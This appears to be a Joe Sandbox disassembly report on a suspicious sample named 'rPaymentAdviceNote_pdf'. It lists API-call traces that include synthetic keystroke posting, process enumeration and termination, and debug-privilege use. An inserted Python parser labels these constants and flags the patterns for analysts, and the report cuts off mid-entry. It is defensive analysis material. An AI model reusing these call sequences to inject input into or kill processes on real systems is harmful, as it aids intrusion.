                                                              • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0087C34F
                                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0087C370
                                                              • DestroyIcon.USER32(00000000), ref: 0087C37F
                                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0087C39C
                                                              • DestroyIcon.USER32(?), ref: 0087C3AB
                                                                • Part of subcall function 008CA4AF: DeleteObject.GDI32(00000000), ref: 008CA4E8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                              • String ID:
                                                              • API String ID: 2819616528-0
                                                              • Opcode ID: 5797779ec2306730f749f9de2688d0ce0ba533db8e19194db6f0a828809566a4
                                                              • Instruction ID: 20966d4a7e7c65cf061b367be99cb972d0befea925456cec308536d043e036a5
                                                              • Opcode Fuzzy Hash: 5797779ec2306730f749f9de2688d0ce0ba533db8e19194db6f0a828809566a4
                                                              • Instruction Fuzzy Hash: 12513670614209EFDB24DF64CC45FAA7BB9FB58324F508528F946D72A0D7B0E990DB50
                                                              APIs
                                                                • Part of subcall function 0089A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0089A84C
                                                                • Part of subcall function 0089A82C: GetCurrentThreadId.KERNEL32 ref: 0089A853
                                                                • Part of subcall function 0089A82C: AttachThreadInput.USER32(00000000,?,00899683,?,00000001), ref: 0089A85A
                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 0089968E
                                                              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 008996AB
                                                              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 008996AE
                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 008996B7
                                                              • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 008996D5
                                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 008996D8
                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 008996E1
                                                              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 008996F8
                                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 008996FB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                              • String ID:
                                                              • API String ID: 2014098862-0
                                                              • Opcode ID: dd1e3b292fa450f2413d34591e8c3e07274dae8713f9fb9d7652bd471f61525f
                                                              • Instruction ID: 0e40e24b5e3c7027aab549fe7afa47e5e01588261212bb94fe267ae73453b672
                                                              • Opcode Fuzzy Hash: dd1e3b292fa450f2413d34591e8c3e07274dae8713f9fb9d7652bd471f61525f
                                                              • Instruction Fuzzy Hash: 1E11E571910218BEFA116F64DC49F6A3F2EFB5C795F110426F744AB0A1C9F35C10DAA4
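The listings in these entries (the AttachThreadInput / MapVirtualKeyW / PostMessageW sequence directly above, the WM_SETICON SendMessageW calls in the icon-loading function, and the OpenProcess / TerminateProcess pair further down) print window messages, virtual-key codes and process access masks as raw hex. The following is an added example, not part of the Joe Sandbox report: it parses lines in this "APIs" format, labels those constants with their documented Win32 names, and flags two call patterns a triage analyst would want to see (synthetic keystrokes posted to a foreign thread after AttachThreadInput, and OpenProcess with PROCESS_TERMINATE followed by TerminateProcess). The sample input is constructed from lines copied from this page; the regex and the pattern checks are this example's own assumptions about the format.

```python
"""Decode Joe Sandbox "APIs" listing lines and label raw Win32 constants."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: lines copied verbatim from the report's "APIs" listings.
SAMPLE_LISTING = """\
• Part of subcall function 0089A82C: AttachThreadInput.USER32(00000000,?,00899683,?,00000001), ref: 0089A85A
• MapVirtualKeyW.USER32(00000025,00000000), ref: 0089968E
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 008996AB
• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 008996F8
• SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0087C370
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 008BE9A4
• TerminateProcess.KERNEL32(00000000,00000000), ref: 008BEA63
• _memset.LIBCMT ref: 008BF6B5
"""

# Assumed line shape: "• [Part of subcall function XXXXXXXX: ]Api.MODULE[(args)], ref: XXXXXXXX"
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

# Documented Win32 values used to label the arguments.
WM_SETICON, WM_KEYDOWN, WM_KEYUP = 0x0080, 0x0100, 0x0101
VK_NAMES = {0x25: "VK_LEFT", 0x26: "VK_UP", 0x27: "VK_RIGHT", 0x28: "VK_DOWN"}
PROCESS_TERMINATE = 0x0001


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]  # None where the sandbox printed "?"
    ref: int
    subcall_of: Optional[int] = None


def parse_args(text: Optional[str]) -> List[Optional[int]]:
    """Split the hex argument list; "?" means the sandbox could not recover it."""
    if not text:
        return []
    return [None if a == "?" else int(a, 16) for a in text.split(",")]


def parse_listing(listing: str) -> List[ApiCall]:
    calls: List[ApiCall] = []
    for line in listing.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # headings such as "APIs" / "Strings" and non-call lines
        calls.append(ApiCall(
            api=m["api"], module=m["mod"], args=parse_args(m["args"]),
            ref=int(m["ref"], 16),
            subcall_of=int(m["sub"], 16) if m["sub"] else None))
    return calls


def describe(call: ApiCall) -> str:
    """Label the constant arguments the report leaves as raw hex."""
    a = call.args
    if call.api in ("PostMessageW", "SendMessageW") and len(a) >= 3:
        msg, wparam = a[1], a[2]
        if msg in (WM_KEYDOWN, WM_KEYUP):
            name = "WM_KEYDOWN" if msg == WM_KEYDOWN else "WM_KEYUP"
            key = VK_NAMES.get(wparam, "?" if wparam is None else hex(wparam))
            return f"{name} {key}"
        if msg == WM_SETICON:
            return "WM_SETICON " + ("ICON_SMALL" if wparam == 0 else "ICON_BIG")
    if call.api == "OpenProcess" and a and a[0] is not None:
        flags = ["PROCESS_TERMINATE"] if a[0] & PROCESS_TERMINATE else []
        return "access=" + ("|".join(flags) or hex(a[0]))
    return ""


def injects_keystrokes(calls: List[ApiCall]) -> bool:
    """AttachThreadInput plus WM_KEYDOWN posted to another window: synthetic input."""
    attached = any(c.api == "AttachThreadInput" for c in calls)
    keydown = any(c.api == "PostMessageW" and len(c.args) >= 2
                  and c.args[1] == WM_KEYDOWN for c in calls)
    return attached and keydown


def kills_processes(calls: List[ApiCall]) -> List[int]:
    """Refs of OpenProcess(PROCESS_TERMINATE) that are followed by TerminateProcess."""
    refs = []
    for i, c in enumerate(calls):
        if (c.api == "OpenProcess" and c.args and c.args[0] is not None
                and c.args[0] & PROCESS_TERMINATE
                and any(d.api == "TerminateProcess" for d in calls[i + 1:])):
            refs.append(c.ref)
    return refs


if __name__ == "__main__":
    parsed = parse_listing(SAMPLE_LISTING)
    for c in parsed:
        print(f"{c.ref:08X} {c.api}.{c.module} {describe(c)}")
    print("keystroke injection:", injects_keystrokes(parsed))
    print("process kill refs:", [f"{r:08X}" for r in kills_processes(parsed)])
```

The regex accepts the three line shapes that occur in these listings: a plain call with an argument list, a call with no argument list (`_memset.LIBCMT ref: ...`), and a `Part of subcall function` prefix; negative hex arguments such as `-C0000018` parse because `int(x, 16)` accepts a sign. Anything that does not match (section labels, fuzzy-hash lines) is skipped rather than raising, so a whole entry can be pasted in unchanged.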
                                                              APIs
                                                              • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0089853C,00000B00,?,?), ref: 0089892A
                                                              • HeapAlloc.KERNEL32(00000000,?,0089853C,00000B00,?,?), ref: 00898931
                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0089853C,00000B00,?,?), ref: 00898946
                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,0089853C,00000B00,?,?), ref: 0089894E
                                                              • DuplicateHandle.KERNEL32(00000000,?,0089853C,00000B00,?,?), ref: 00898951
                                                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0089853C,00000B00,?,?), ref: 00898961
                                                              • GetCurrentProcess.KERNEL32(0089853C,00000000,?,0089853C,00000B00,?,?), ref: 00898969
                                                              • DuplicateHandle.KERNEL32(00000000,?,0089853C,00000B00,?,?), ref: 0089896C
                                                              • CreateThread.KERNEL32(00000000,00000000,00898992,00000000,00000000,00000000), ref: 00898986
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                              • String ID:
                                                              • API String ID: 1957940570-0
                                                              • Opcode ID: 4651f599454f3484359c6f5f1af50357eff9162500a08b2246b9174e67671820
                                                              • Instruction ID: 2b3469d8438bdbd8081ab8c74e3ea200647de3a40a910840938e98bb44cdbe99
                                                              • Opcode Fuzzy Hash: 4651f599454f3484359c6f5f1af50357eff9162500a08b2246b9174e67671820
                                                              • Instruction Fuzzy Hash: B501ACB5240304FFE611ABA5DC49F677B6DFB89711F444421FB05DB191CA7598008A20
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: NULL Pointer assignment$Not an Object type
                                                              • API String ID: 0-572801152
                                                              • Opcode ID: 2a4901752d22e8f98c2ca19babcdf259ae0d00648aa997cfd150187e0e638d63
                                                              • Instruction ID: 3153096313df38f0d041329619cde2008508115c12d6927567dbe4e7f7ca343d
                                                              • Opcode Fuzzy Hash: 2a4901752d22e8f98c2ca19babcdf259ae0d00648aa997cfd150187e0e638d63
                                                              • Instruction Fuzzy Hash: BCC17171A0021A9BDF10DFA8D884AEEB7F5FB48314F158469EA45EB381E770ED45CB90
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearInit$_memset
                                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                              • API String ID: 2862541840-625585964
                                                              • Opcode ID: d035610baa5c7feed8b885ef28c76e2cd7ee4631daccd5ebf8ba9dd26a49a59b
                                                              • Instruction ID: 6ca47e994bcddebd6b3adf7aa324805f18ad116911f18f0cfd867ec649ef65a1
                                                              • Opcode Fuzzy Hash: d035610baa5c7feed8b885ef28c76e2cd7ee4631daccd5ebf8ba9dd26a49a59b
                                                              • Instruction Fuzzy Hash: 09915971A00219ABDF24CFA5C888FEEBBB8FF49714F108159E655EB381D7709945CBA0
                                                              APIs
                                                                • Part of subcall function 0089710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00897044,80070057,?,?,?,00897455), ref: 00897127
                                                                • Part of subcall function 0089710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00897044,80070057,?,?), ref: 00897142
                                                                • Part of subcall function 0089710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00897044,80070057,?,?), ref: 00897150
                                                                • Part of subcall function 0089710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00897044,80070057,?), ref: 00897160
                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 008B9806
                                                              • _memset.LIBCMT ref: 008B9813
                                                              • _memset.LIBCMT ref: 008B9956
                                                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 008B9982
                                                              • CoTaskMemFree.OLE32(?), ref: 008B998D
                                                              Strings
                                                              • NULL Pointer assignment, xrefs: 008B99DB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                              • String ID: NULL Pointer assignment
                                                              • API String ID: 1300414916-2785691316
                                                              • Opcode ID: 9851640814788d65e1e1a274a9c9fb9d56787319a00fdd075a057c8e5c646016
                                                              • Instruction ID: dcd3a106b517723fe17d77c5fd0e709823e32c5819b2d3c068bcd3ac1cc63e94
                                                              • Opcode Fuzzy Hash: 9851640814788d65e1e1a274a9c9fb9d56787319a00fdd075a057c8e5c646016
                                                              • Instruction Fuzzy Hash: CC91147190022DEBDB10DFA5DC41EDEBBB9FF08710F20416AE519E7291EB719A44CBA1
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 008C6E24
                                                              • SendMessageW.USER32(?,00001036,00000000,?), ref: 008C6E38
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 008C6E52
                                                              • _wcscat.LIBCMT ref: 008C6EAD
                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 008C6EC4
                                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 008C6EF2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window_wcscat
                                                              • String ID: SysListView32
                                                              • API String ID: 307300125-78025650
                                                              • Opcode ID: f78f234f961dd3fd8b392f9b8710553b3398346fc7d4ee4b228adfa98fb1e0d2
                                                              • Instruction ID: 56057b7e37b5e278afb15fae289217ac1e930aec943c30d389c31eacd8613898
                                                              • Opcode Fuzzy Hash: f78f234f961dd3fd8b392f9b8710553b3398346fc7d4ee4b228adfa98fb1e0d2
                                                              • Instruction Fuzzy Hash: A3418271A00348ABEB219F64CC85FEA77B9FF08354F10446EF685D7291D672DD948B60
APIs
  • Part of subcall function 008A3C55: CreateToolhelp32Snapshot.KERNEL32 ref: 008A3C7A
  • Part of subcall function 008A3C55: Process32FirstW.KERNEL32(00000000,?), ref: 008A3C88
  • Part of subcall function 008A3C55: CloseHandle.KERNEL32(00000000), ref: 008A3D52
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 008BE9A4
• GetLastError.KERNEL32 ref: 008BE9B7
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 008BE9E6
• TerminateProcess.KERNEL32(00000000,00000000), ref: 008BEA63
• GetLastError.KERNEL32(00000000), ref: 008BEA6E
• CloseHandle.KERNEL32(00000000), ref: 008BEAA3
Strings
Memory Dump Source
• Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
Similarity
• API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
• String ID: SeDebugPrivilege
• API String ID: 2533919879-2896544425
• Opcode ID: eb2b91d4de1e24e53fc380e358e1aeb233bd36fa4c25c1c8c3dddede714fe8f9
• Instruction ID: 5fff90bc31ca9aae18072ebe872ac223ba3890507375f98f98e4e62cebb4ed82
• Opcode Fuzzy Hash: eb2b91d4de1e24e53fc380e358e1aeb233bd36fa4c25c1c8c3dddede714fe8f9
• Instruction Fuzzy Hash: B8418A312002059FDB21EF28CC95FAEBBA5FF50314F088419FA429B3D2DB75A804CB96
APIs
• LoadIconW.USER32(00000000,00007F03), ref: 008A3033
Strings
Memory Dump Source
• Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
Similarity
• API ID: IconLoad
• String ID: blank$info$question$stop$warning
• API String ID: 2457776203-404129466
• Opcode ID: 4c049e5a783180c8a07b4a71d8e50b5b05b3b01d1454636a830365fac30e2825
• Instruction ID: 4e471a22b58045f4a5e95fbf221f0d65924952d64483f25733df0f8d11216be7
• Opcode Fuzzy Hash: 4c049e5a783180c8a07b4a71d8e50b5b05b3b01d1454636a830365fac30e2825
• Instruction Fuzzy Hash: 14112B35348B8ABFF7149B18DC42C6B779CFF1A324B20006AFA10E6682EB755F4055A5
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 008A4312
• LoadStringW.USER32(00000000), ref: 008A4319
• GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 008A432F
• LoadStringW.USER32(00000000), ref: 008A4336
• _wprintf.LIBCMT ref: 008A435C
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 008A437A
Strings
• %s (%d) : ==> %s: %s %s, xrefs: 008A4357
Memory Dump Source
• Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
Similarity
• API ID: HandleLoadModuleString$Message_wprintf
• String ID: %s (%d) : ==> %s: %s %s
• API String ID: 3648134473-3128320259
• Opcode ID: df2de7a32fb8cedee2387ef81076c79a849eb71594ca49a4d49b615884a599d8
• Instruction ID: a4513ccce6de4cd602a2130f732450aec645aec1a31856a7d9cd42e72a221560
• Opcode Fuzzy Hash: df2de7a32fb8cedee2387ef81076c79a849eb71594ca49a4d49b615884a599d8
• Instruction Fuzzy Hash: 2A014FF2900208BFFB1197A4DD89EE6777CFB08301F0005A6B745E2152EA749E854B75
APIs
  • Part of subcall function 00842612: GetWindowLongW.USER32(?,000000EB), ref: 00842623
• GetSystemMetrics.USER32(0000000F), ref: 008CD47C
• GetSystemMetrics.USER32(0000000F), ref: 008CD49C
• MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 008CD6D7
• SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 008CD6F5
• SendMessageW.USER32(00000003,00000469,?,00000000), ref: 008CD716
• ShowWindow.USER32(00000003,00000000), ref: 008CD735
• InvalidateRect.USER32(?,00000000,00000001), ref: 008CD75A
• DefDlgProcW.USER32(?,00000005,?,?), ref: 008CD77D
Memory Dump Source
• Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
Similarity
• API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
• String ID:
• API String ID: 1211466189-0
• Opcode ID: a927ca408d08c3f07ec28bdc61d54a6ec9d12d1a16b5761f6926041ea4b85b01
• Instruction ID: 79ca426b1c7baaf4229cb9e5024dea2a36363b618b30a05c943ce73cf0d64324
• Opcode Fuzzy Hash: a927ca408d08c3f07ec28bdc61d54a6ec9d12d1a16b5761f6926041ea4b85b01
• Instruction Fuzzy Hash: 92B16871600229AFDF14DF68C985BAA7BB1FF48711F09C079ED48DA295D734E950CB90
APIs
• ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0087C1C7,00000004,00000000,00000000,00000000), ref: 00842ACF
• ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0087C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00842B17
• ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0087C1C7,00000004,00000000,00000000,00000000), ref: 0087C21A
• ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0087C1C7,00000004,00000000,00000000,00000000), ref: 0087C286
Memory Dump Source
• Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
Similarity
• API ID: ShowWindow
• String ID:
• API String ID: 1268545403-0
• Opcode ID: f6b8ac181d8e9399751cb4eeff7e9b1a1837de704b50263dee2accef801b0c81
• Instruction ID: f3f6aae252ae2c06efc482ee5474264491784e04e7eeb2711d5c11e24c99fe71
• Opcode Fuzzy Hash: f6b8ac181d8e9399751cb4eeff7e9b1a1837de704b50263dee2accef801b0c81
• Instruction Fuzzy Hash: 8141243021C6889AD735CB288C8CB6B7BA2FB85314F98C81DF94BC3562C675D885D721
APIs
• InterlockedExchange.KERNEL32(?,000001F5), ref: 008A70DD
  • Part of subcall function 00860DB6: std::exception::exception.LIBCMT ref: 00860DEC
  • Part of subcall function 00860DB6: __CxxThrowException@8.LIBCMT ref: 00860E01
• ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 008A7114
• EnterCriticalSection.KERNEL32(?), ref: 008A7130
• _memmove.LIBCMT ref: 008A717E
• _memmove.LIBCMT ref: 008A719B
• LeaveCriticalSection.KERNEL32(?), ref: 008A71AA
• ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 008A71BF
• InterlockedExchange.KERNEL32(?,000001F6), ref: 008A71DE
Memory Dump Source
• Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
Similarity
• API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
• String ID:
• API String ID: 256516436-0
• Opcode ID: 6994b0cd5946f6e740c7079bf6eade0788e43f57191c1c8b9af8dee726030d81
• Instruction ID: 188cd3172222342ac2c08e3f45351c01c1c037d0cbf985cc61d643e6a7cbf107
